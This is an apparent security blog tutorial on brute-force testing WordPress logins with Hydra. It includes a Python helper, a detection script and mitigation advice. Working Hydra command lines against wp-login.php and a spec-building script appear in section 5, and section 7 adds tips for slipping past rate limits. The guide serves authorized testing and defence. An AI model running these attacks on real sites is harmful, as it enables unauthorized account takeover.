dotlinux blog

WordPress Brute Force Testing with Hydra: Complete Security Guide

In today’s digital landscape, WordPress powers over 40% of the internet, making it a prime target for cyberattacks. One of the most common and dangerous threats is the brute force attack, where malicious actors systematically try thousands of username-password combinations to gain unauthorized access to your WordPress admin panel.

To protect your site, you need to understand how these attacks work—and how to test your own defenses. This guide will walk you through brute force testing WordPress sites using Hydra, a powerful open-source tool for password cracking. By the end, you’ll learn to simulate attacks, identify vulnerabilities, and implement robust security measures to keep your site safe.

2026-01

Table of Contents#

  1. What is a Brute Force Attack?
  2. Why WordPress is Vulnerable to Brute Force Attacks
  3. What is Hydra?
  4. Prerequisites for Testing
  5. Step-by-Step Guide to Brute Force Testing with Hydra
  6. Mitigation Strategies to Prevent Brute Force Attacks
  7. Troubleshooting Common Hydra Issues
  8. Conclusion
  9. References

1. What is a Brute Force Attack?#

A brute force attack is a trial-and-error method where an attacker systematically attempts every possible combination of usernames and passwords until they find the correct one. Unlike more sophisticated attacks (e.g., SQL injection), brute force relies on raw computing power and time. For WordPress sites, attackers often target the /wp-login.php page, as it’s the primary entry point for admin access.

Brute force attacks are effective against weak passwords (e.g., "password123", "admin") or default credentials (e.g., username "admin"). Even strong passwords can be cracked with enough time and resources, though modern security measures significantly raise the bar.

2. Why WordPress is Vulnerable to Brute Force Attacks#

WordPress’s popularity makes it a high-value target. Several factors increase its risk:

  • Default Credentials: Many users retain the default "admin" username, making it easier for attackers to guess.
  • Weak Passwords: Users often use simple, memorable passwords (e.g., "123456", "qwerty").
  • Lack of Login Limits: By default, WordPress does not restrict the number of failed login attempts, allowing attackers to try unlimited combinations.
  • Public Login Page: The /wp-login.php endpoint is publicly accessible, making it easy for attackers to target.

3. What is Hydra?#

Hydra (also known as THC-Hydra) is a popular open-source password-cracking tool developed by THC (The Hacker’s Choice). It supports many protocols (HTTP, FTP, SSH, SMTP, etc.) and runs login attempts in parallel, so it can test many credentials at once instead of one after another.

Key features of Hydra:

  • Supports 50+ protocols (including HTTP POST, which is critical for WordPress).
  • Customizable attack speed (adjustable threads).
  • Ability to use wordlists for usernames and passwords.
  • Cross-platform (Linux, Windows, macOS).

4. Prerequisites for Testing#

Before using Hydra to test a WordPress site, ensure you meet these requirements:

4.1 Authorization#

Critical: You must have explicit permission to test the target WordPress site. Unauthorized brute force testing is illegal in most jurisdictions (violates laws like the Computer Fraud and Abuse Act in the U.S.) and unethical. Use Hydra only on your own sites or sites you own/operate.

4.2 Tools and Setup#

  • Kali Linux: Hydra is pre-installed on Kali Linux (a penetration-testing distribution). If you use another OS, install Hydra via:
    • Ubuntu/Debian: sudo apt install hydra
    • macOS: brew install hydra
  • WordPress Test Site: Use a local or staging WordPress site (not production!) for testing. Tools like XAMPP or Local by Flywheel can set up a local WordPress environment.
  • Wordlist Files: Hydra requires lists of potential usernames and passwords. Kali Linux includes prebuilt wordlists in /usr/share/wordlists/ (e.g., rockyou.txt, a popular list of 14 million+ common passwords).
  • Basic Command-Line Knowledge: You’ll need to run Hydra via the terminal, so familiarity with Linux commands (e.g., cd, ls) is helpful.

5. Step-by-Step Guide to Brute Force Testing with Hydra#

Let’s walk through testing a WordPress site with Hydra. We’ll use a local test site (http://localhost/wp-test) for demonstration.

5.1 Identify the WordPress Login Endpoint#

First, confirm the login URL. For most WordPress sites, this is http://<target>/wp-login.php (e.g., http://localhost/wp-test/wp-login.php).

Verify the endpoint by visiting it in a browser—you should see the WordPress login form.

5.2 Capture the Login Request (POST Data)#

To brute force WordPress, we need to mimic the HTTP POST request sent when a user submits the login form. This includes:

  • The URL (/wp-login.php).
  • POST parameters (username, password, submit button, etc.).
  • Indicators of success/failure (e.g., a redirect on success or an error message on failure).

How to Capture the Request:#

Use your browser’s Developer Tools (F12 in Chrome/Firefox) or a proxy tool like Burp Suite. Here’s how with Chrome:

  1. Go to http://localhost/wp-test/wp-login.php.
  2. Open Developer Tools → Network tab.
  3. Enter dummy credentials (e.g., username: "test", password: "test") and click "Log In".
  4. In the Network tab, find the request to wp-login.php (filter by "Doc" or "POST").
  5. Click the request → Payload tab to view POST data.

You’ll see parameters like:

log=test&pwd=test&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwp-test%2Fwp-admin%2F&testcookie=1  

Key parameters:

  • log: The username field (variable: ^USER^ in Hydra).
  • pwd: The password field (variable: ^PWD^ in Hydra).
  • wp-submit=Log+In: The submit button (static value).
  • redirect_to: URL to redirect on success (static value).

5.3 Prepare Wordlists#

Hydra uses separate wordlists for usernames (-L flag) and passwords (-P flag).

Username List (userlist.txt):#

Create a simple list of potential usernames (e.g., admin, editor, testuser):

admin  
editor  
testuser  

Password List:#

Use Kali’s rockyou.txt (unzip first with sudo gunzip /usr/share/wordlists/rockyou.txt.gz), or create a custom list (passlist.txt) with weak passwords:

password  
123456  
qwerty  
admin123  
letmein  

5.4 Construct the Hydra Command#

Hydra’s syntax for HTTP POST brute force is:

hydra -L <userlist> -P <passlist> <target> http-post-form "<login-path>:<post-data>:<success-indicator>"  

Breakdown of Parameters:#

  • -L <userlist>: Path to the username wordlist (e.g., userlist.txt).
  • -P <passlist>: Path to the password wordlist (e.g., passlist.txt).
  • <target>: IP address or domain of the WordPress site (e.g., localhost or 192.168.1.100).
  • http-post-form: Hydra module for HTTP POST requests.
  • <login-path>: The login endpoint (e.g., /wp-test/wp-login.php).
  • <post-data>: POST parameters with ^USER^ (replaced with usernames) and ^PWD^ (replaced with passwords).
  • <success-indicator>: A condition Hydra checks against each response: either S=<string>, a string that appears only on a successful login (e.g., "Location: wp-admin" for the redirect), or F=<string>, a string that appears only on a failed login (e.g., "Invalid").
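The following is an added example, not code from the original post, that automates the hand-assembly described in sections 5.2 and 5.4: it takes the POST body captured from the browser, swaps the log and pwd fields for Hydra's ^USER^ and ^PWD^ placeholders, re-encodes the remaining fields exactly as the browser sent them, and emits the http-post-form argument plus the full argv. The captured body is the one shown in section 5.2; the function names are mine. It also applies Hydra's documented escaping rule (a literal colon inside the spec must be written as \:), which matters for a condition like "S=Location: wp-admin", and refuses to build a spec when the username or password field is missing from the capture (the section 7 "Incorrect POST Parameters" case).

```python
"""Build a Hydra http-post-form spec from a captured WordPress login POST.

Added example for sections 5.2 and 5.4; not part of the original post.
"""
import shlex
from urllib.parse import parse_qsl, urlencode

# Constructed sample: the body shown in section 5.2, as copied from the
# browser's Payload tab after submitting the dummy credentials test/test.
CAPTURED_BODY = (
    "log=test&pwd=test&wp-submit=Log+In"
    "&redirect_to=http%3A%2F%2Flocalhost%2Fwp-test%2Fwp-admin%2F&testcookie=1"
)

# WordPress's own form field names for username and password (section 5.2).
USER_FIELD = "log"
PASS_FIELD = "pwd"


def hydra_escape(value: str) -> str:
    """Hydra splits the http-post-form spec on ':'; a literal colon inside a
    value has to be written as '\\:' (Hydra's documented escaping rule)."""
    return value.replace(":", "\\:")


def build_post_form_spec(login_path: str, captured_body: str, condition: str) -> str:
    """Return Hydra's "<path>:<post-data>:<condition>" argument.

    The username and password fields become ^USER^ and ^PWD^; every other
    field keeps its captured value, re-encoded exactly as the browser sent it,
    so wp-submit, redirect_to and testcookie still match the real request.
    """
    fields = parse_qsl(captured_body, keep_blank_values=True)
    missing = {USER_FIELD, PASS_FIELD} - {name for name, _ in fields}
    if missing:
        # Section 7's "Incorrect POST Parameters" case: fail loudly instead of
        # sending a request WordPress will reject for every candidate.
        raise ValueError(f"captured body lacks login field(s): {sorted(missing)}")

    template = []
    for name, value in fields:
        if name == USER_FIELD:
            value = "^USER^"
        elif name == PASS_FIELD:
            value = "^PWD^"
        template.append((name, value))
    # safe="^" keeps Hydra's placeholders literal; everything else is
    # percent-encoded (spaces become '+') just like the original capture.
    post_data = urlencode(template, safe="^")
    return ":".join(hydra_escape(part) for part in (login_path, post_data, condition))


def build_hydra_command(target, userlist, passlist, spec, threads=4):
    """Assemble the argv list for Hydra; hand it to subprocess.run without a shell."""
    return ["hydra", "-L", userlist, "-P", passlist, "-t", str(threads), "-V",
            target, "http-post-form", spec]


if __name__ == "__main__":
    spec = build_post_form_spec("/wp-test/wp-login.php", CAPTURED_BODY,
                                "S=Location: wp-admin")
    # Printed with shell quoting so the spec survives copy-paste into a terminal.
    print(shlex.join(build_hydra_command("localhost", "userlist.txt",
                                         "passlist.txt", spec)))
```

Because the spec is passed as a single argv element, the shell never sees the ampersands or colons; the only escaping needed is the one Hydra itself parses.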

5.5 Run the Attack and Interpret Results#

Example 1: Basic Brute Force Command#

hydra -L userlist.txt -P passlist.txt localhost http-post-form "/wp-test/wp-login.php:log=^USER^&pwd=^PWD^&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwp-test%2Fwp-admin%2F&testcookie=1:S=Location: wp-admin" -v  

  • -v: Verbose mode (shows progress).
  • S=Location: wp-admin: Success indicator (Hydra looks for "Location: wp-admin" in the response headers, which WordPress sends on successful login).

Example 2: Use rockyou.txt for Passwords#

hydra -L userlist.txt -P /usr/share/wordlists/rockyou.txt localhost http-post-form "/wp-test/wp-login.php:log=^USER^&pwd=^PWD^&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwp-test%2Fwp-admin%2F&testcookie=1:F=Invalid username" -t 4 -V  

  • -t 4: Use 4 threads (adjust based on your system; too many may trigger rate limits).
  • -V: Extra verbose (shows each attempt).
  • F=Invalid username: Failure indicator. Hydra treats an attempt as failed when "Invalid username" appears in the response and reports any response without it as a valid login, so a failure string that does not match every failed response produces false positives.

Interpreting Results#

If Hydra finds valid credentials, it will output:

[STATUS] attack finished for localhost (waiting for children to complete tests)  
[80][http-post-form] host: localhost   login: admin   password: letmein  
1 of 1 target successfully completed, 1 valid password found  

This means the username "admin" and password "letmein" worked.

6. Mitigation Strategies to Prevent Brute Force Attacks#

Once you’ve tested for vulnerabilities, secure your site with these measures:

1. Enforce Strong Passwords#

  • Use passwords with 12+ characters, including uppercase, lowercase, numbers, and symbols (e.g., P@ssw0rd!2024).
  • Avoid common words, names, or dates. Tools like Password Generator can create strong passwords.

2. Limit Login Attempts#

Use WordPress plugins to block repeated failed logins:

3. Enable Two-Factor Authentication (2FA)#

Add a second layer of security with 2FA plugins:

4. Change the Default "admin" Username#

Attackers often target "admin" as the username. Create a unique admin username during WordPress setup or use a plugin like Username Changer.

5. Use a Web Application Firewall (WAF)#

A WAF (e.g., Cloudflare, Sucuri) can block brute force attacks by:

  • Rate-limiting requests to /wp-login.php.
  • Flagging suspicious IP addresses.
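The rate-limiting and IP-flagging that a WAF or login-limit plugin performs can also be run after the fact over the web server's access log, which is useful for checking whether a site was hit before such protections were in place. The example below is added here and is not the author's code or any plugin's; it parses constructed combined-format log lines, counts POSTs to wp-login.php per client IP in a sliding window, and flags clients that exceed a threshold. It also records whether a flagged client later received a 302, the redirect to wp-admin that section 5.5 uses as the success indicator, since a burst of failures followed by a redirect is the case that needs an immediate password reset. Function names, window and threshold are my choices.

```python
"""Flag brute-force login bursts in web-server access logs.

Added example for section 6 (rate limiting and flagging IPs); not part of
the original post.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Combined log format as written by Apache/Nginx: client IP, timestamp,
# request line and status are all this detector needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample: a Hydra-style burst from 192.0.2.10 (five form
# re-renders with HTTP 200, then the 302 redirect to wp-admin that section
# 5.5 uses as the success indicator) next to one ordinary login from
# 198.51.100.7.
SAMPLE_LOG = """\
192.0.2.10 - - [12/Jan/2026:10:15:00 +0000] "GET /wp-test/wp-login.php HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
192.0.2.10 - - [12/Jan/2026:10:15:01 +0000] "POST /wp-test/wp-login.php HTTP/1.1" 200 4200 "-" "Mozilla/5.0"
192.0.2.10 - - [12/Jan/2026:10:15:01 +0000] "POST /wp-test/wp-login.php HTTP/1.1" 200 4200 "-" "Mozilla/5.0"
192.0.2.10 - - [12/Jan/2026:10:15:02 +0000] "POST /wp-test/wp-login.php HTTP/1.1" 200 4200 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Jan/2026:10:15:02 +0000] "POST /wp-test/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.10 - - [12/Jan/2026:10:15:03 +0000] "POST /wp-test/wp-login.php HTTP/1.1" 200 4200 "-" "Mozilla/5.0"
192.0.2.10 - - [12/Jan/2026:10:15:03 +0000] "POST /wp-test/wp-login.php HTTP/1.1" 200 4200 "-" "Mozilla/5.0"
192.0.2.10 - - [12/Jan/2026:10:15:04 +0000] "POST /wp-test/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the fields this detector uses, or None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],   # drop ?action=... query strings
        "status": int(m["status"]),
    }


def detect_bruteforce(lines, window_seconds=60, threshold=5):
    """Return {ip: {"attempts": n, "succeeded": bool}} for every client that
    POSTed to wp-login.php at least `threshold` times within `window_seconds`.

    Lines are assumed to be in chronological order, as access logs are.
    A 302 from a flagged client means WordPress accepted one of its guesses.
    """
    recent = defaultdict(deque)   # ip -> timestamps of login POSTs in window
    totals = defaultdict(int)     # ip -> login POSTs seen so far
    flagged = {}
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["method"] != "POST" or not ev["path"].endswith("/wp-login.php"):
            continue
        ip = ev["ip"]
        totals[ip] += 1
        window = recent[ip]
        window.append(ev["ts"])
        # Slide the window: discard attempts older than window_seconds.
        while (ev["ts"] - window[0]).total_seconds() > window_seconds:
            window.popleft()
        if len(window) >= threshold:
            entry = flagged.setdefault(ip, {"attempts": 0, "succeeded": False})
            entry["attempts"] = totals[ip]
            if ev["status"] == 302:
                entry["succeeded"] = True
    return flagged


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG.splitlines()).items():
        state = "SUCCEEDED" if info["succeeded"] else "failed so far"
        print(f"{ip}: {info['attempts']} login attempts, {state}")
```

The same window-and-threshold logic, applied in real time per IP (and, for distributed attacks, per targeted username), is what a login-limit plugin or WAF rule enforces before the request reaches WordPress.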

6. Disable XML-RPC (If Unused)#

XML-RPC (/xmlrpc.php) is used for remote publishing but can be exploited for brute force attacks. Disable it via:

  • Plugins like Disable XML-RPC.
  • Adding add_filter('xmlrpc_enabled', '__return_false'); to your theme’s functions.php or a must-use plugin (wp-config.php runs before add_filter() is defined, so placing the line there causes a fatal error).

7. Troubleshooting Common Hydra Issues#

Issue: Hydra Fails Due to Dynamic Nonces#

WordPress sometimes includes a nonce (a temporary security token) in the login form to prevent CSRF attacks. Hydra cannot handle dynamic nonces by default, causing failed attempts.

Fix:

  • Check if the nonce is static (unlikely). If so, include it in the POST data.
  • Use tools like Burp Intruder (which can handle dynamic tokens) as an alternative.

Issue: Rate Limiting Blocks Hydra#

If your test site has login limits (e.g., via Wordfence), Hydra may get blocked mid-attack.

Fix:

  • Temporarily disable login limits on your test site.
  • Reduce Hydra’s thread count (-t) to slow the attack.

Issue: Incorrect POST Parameters#

If Hydra returns "0 valid passwords found" even with known credentials, check the POST data for typos (e.g., missing wp-submit=Log+In or incorrect redirect_to URL).

Fix: Re-capture the login request with Developer Tools to verify parameters.

8. Conclusion#

Brute force attacks pose a significant risk to WordPress sites, but with tools like Hydra, you can proactively test your defenses. By following this guide, you’ve learned to simulate attacks, identify weak points, and implement critical security measures (strong passwords, 2FA, login limits).

Remember: always test ethically—only target sites you own or have explicit permission to test. With the right tools and practices, you can keep your WordPress site secure against brute force threats.

9. References#